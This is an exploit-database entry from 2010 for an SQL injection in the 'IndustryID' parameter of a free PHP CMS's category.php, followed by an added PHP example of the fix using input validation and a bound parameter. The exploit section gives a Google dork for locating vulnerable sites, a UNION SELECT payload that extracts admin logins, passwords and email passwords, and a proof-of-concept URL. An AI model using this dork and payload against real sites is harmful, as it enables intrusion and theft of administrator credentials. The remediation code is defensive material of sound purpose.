CmS (id) SQL Injection Vulnerability

2010-04-22T00:00:00
ID 1337DAY-ID-11926
Type zdt
Reporter spykit
Modified 2010-04-22T00:00:00

Description

Exploit for the PHP platform, in the web applications category

                                        

-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------
 
Exploitz:
~~~~~~~
 
union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
----------------------------------------------------------------
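
On the defensive side, a handler such as category.php closes this class of bug by accepting IndustryID only as a positive integer and passing it to the database as a bound parameter. The script below is an added example, not code from the advisory or from the vendor; the function name, the categories table and its columns, and the in-memory SQLite data are assumptions made so that it runs offline.

```php
<?php
declare(strict_types=1);

// Added example. findByIndustryId(), the "categories" table and its columns
// are hypothetical; the application's real schema is not shown in the advisory.

/**
 * Hardened lookup for category.php?IndustryID=...
 * Returns the matching rows, or null when the parameter is not a positive integer.
 */
function findByIndustryId(PDO $db, $raw): ?array
{
    // 1. Allow-list: the parameter must be a positive integer and nothing else.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller should answer HTTP 400 and log the request
    }
    // 2. Bound parameter: the value is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT IndustryID, Name FROM categories WHERE IndustryID = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE categories (IndustryID INTEGER PRIMARY KEY, Name TEXT)');
$db->exec("INSERT INTO categories VALUES (1, 'Hotels'), (2, 'Travel')");

$inputs = [
    '2',                                       // normal request
    '1 union all select ... from admin--',     // shape of the input in this advisory (elided)
    '-1',                                      // out of range
    '2abc',                                    // trailing garbage
    null,                                      // parameter missing
];
foreach ($inputs as $raw) {
    $rows = findByIndustryId($db, $raw);
    printf("%-42s => %s\n", var_export($raw, true),
        $rows === null ? 'rejected (400)' : json_encode($rows));
}
```

Only the first input reaches the database; every other value is rejected before any SQL is prepared.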


